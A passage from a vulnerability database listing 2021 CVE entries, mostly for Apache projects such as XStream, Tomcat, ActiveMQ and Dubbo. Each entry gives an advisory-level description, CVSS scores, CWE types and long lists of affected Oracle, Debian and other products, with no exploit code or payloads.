oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21345 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N 1.3 4.0
nvd@nist.gov 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,CWE-502,CWE-78,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21346 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle bi_publisher 12.2.1.4.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle bi_publisher 12.2.1.3.0
oracle bi_publisher 5.5.0.0.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21347 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,CWE-434,CWE-502,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
oracle weblogic_server 12.1.3.0.0
CVE-2021-21348 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H 1.6 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-502,CWE-400,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21349 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 3.9 4.0
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-918,CWE-918,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle graalvm 20.3.4
oracle webcenter_portal 11.1.1.9.0
oracle java_se 8u311
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle graalvm 21.3.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle java_se 7u321
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21350 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
oracle weblogic_server 12.1.3.0.0
CVE-2021-21351 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 2.3 6.0
security-advisories@github.com 5.4 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N 1.0 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21501 MEDIUM

Improper configuration can cause a directory traversal problem in ServiceComb ServiceCenter 1.x.x versions; this is fixed in 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2021-22160 HIGH

If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-347,

Products Affected

Vendor Product Version
apache pulsar *
CVE-2021-22696 MEDIUM

CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a "request" parameter, the spec also supports specifying a URI from which to retrieve a JWT token via the "request_uri" parameter. CXF was not validating the "request_uri" parameter (apart from ensuring it uses "https") and was making a REST request to the parameter in the request to retrieve a token. This means that CXF was vulnerable to DDoS attacks on the authorization server, as specified in section 10.4.1 of the spec. This issue affects Apache CXF versions prior to 3.4.3; Apache CXF versions prior to 3.3.10.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-918,CWE-918,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle business_intelligence 12.2.1.4.0
oracle communications_session_route_manager *
apache cxf *
oracle communications_diameter_intelligence_hub *
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_element_manager 8.2.2
CVE-2021-23901 MEDIUM

An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
apache nutch *
CVE-2021-23926 MEDIUM

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
netapp snap_creator_framework -
oracle peoplesoft_enterprise_peopletools 8.58
debian debian_linux 9.0
oracle middleware_common_libraries_and_tools 12.2.1.3.0
apache xmlbeans *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
netapp snapmanager -
oracle peoplesoft_enterprise_peopletools 8.57
netapp oncommand_unified_manager_core_package -
CVE-2021-23937 MEDIUM

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application, causing a possible denial of service on either the internal infrastructure or the web application itself. This issue affects Apache Wicket 9.x version 9.2.0 and prior versions; Apache Wicket 8.x version 8.11.0 and prior versions; Apache Wicket 7.x version 7.17.0 and prior versions; and Apache Wicket 6.x version 6.2.0 and later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket *
CVE-2021-24117 MEDIUM

In Apache Teaclave Rust SGX SDK 1.1.3, a side-channel vulnerability in base64 PEM file decoding allows system-level (administrator) attackers to obtain information about secret RSA keys via a controlled-channel and side-channel attack on software running in isolated environments that can be single stepped, especially Intel SGX.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
apache teaclave_sgx_sdk 1.1.3
CVE-2021-24122 MEDIUM

When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-706,

Products Affected

Vendor Product Version
apache tomcat *
oracle agile_plm 9.3.3
debian debian_linux 9.0
apache tomcat 9.0.0
oracle agile_plm 9.3.6
apache tomcat 10.0.0
CVE-2021-25122 MEDIUM

When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
oracle database 19c
debian debian_linux 9.0
oracle database 12.2.0.1
oracle instantis_enterprisetrack 17.1
apache tomcat 10.0.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle communications_cloud_native_core_security_edge_protection_proxy 1.6.0
oracle agile_plm 9.3.3
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
apache tomcat 9.0.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client 21.3.0
oracle graph_server_and_client *
CVE-2021-25329 MEDIUM

The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0 to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
oracle siebel_ui_framework 21.9
oracle database 19c
debian debian_linux 9.0
oracle database 12.2.0.1
oracle instantis_enterprisetrack 17.1
apache tomcat 10.0.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle communications_cloud_native_core_security_edge_protection_proxy 1.6.0
oracle agile_plm 9.3.3
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
apache tomcat 9.0.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client *
CVE-2021-25640 MEDIUM

In Apache Dubbo prior to 2.6.9 and 2.7.9, the usage of parseURL method will lead to the bypass of white host check which can cause open redirect or SSRF vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-601,CWE-918,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-25641 HIGH

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, i.e. not following the server's instruction. This means that if a weak deserializer such as Kryo or FST is somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-25642

ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used.

Products Affected

Vendor Product Version
apache hadoop *
CVE-2021-25646 HIGH

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-25958 MEDIUM

Apache OFBiz versions v17.12.01 to v17.12.07 implement try/catch exception handling at multiple locations but leak sensitive table info, which may aid an attacker in further reconnaissance. A user can register with a very long password, but when they try to log in with it an exception occurs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
vulnerabilitylab@mend.io 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L 3.9 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,CWE-209,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-26117 MEDIUM

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid user's password in error, resulting in no check on the password.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
apache activemq *
debian debian_linux 9.0
apache activemq_artemis *
oracle flexcube_private_banking 12.0.0
netapp oncommand_workflow_automation -
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
CVE-2021-26118 MEDIUM

While investigating ARTEMIS-2964 it was found that the creation of advisory messages in the OpenWire protocol head of Apache ActiveMQ Artemis 2.15.0 bypassed policy based access control for the entire session. Production of advisory messages was not subject to access control in error.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
netapp oncommand_workflow_automation -
apache activemq_artemis 2.15.0
CVE-2021-26291 MEDIUM

Apache Maven will follow repositories that are defined in a dependency's Project Object Model (pom), which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details are available in the referenced URLs. If you are currently using a repository manager to govern the repositories used by your builds, you are unaffected by the risks present in the legacy behavior, and are unaffected by this vulnerability and change to default behavior. See this link for more information about repository management: https://maven.apache.org/repository-management.html

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
oracle goldengate_big_data_and_application_adapters 23.1
oracle financial_services_analytical_applications_infrastructure *
quarkus quarkus *
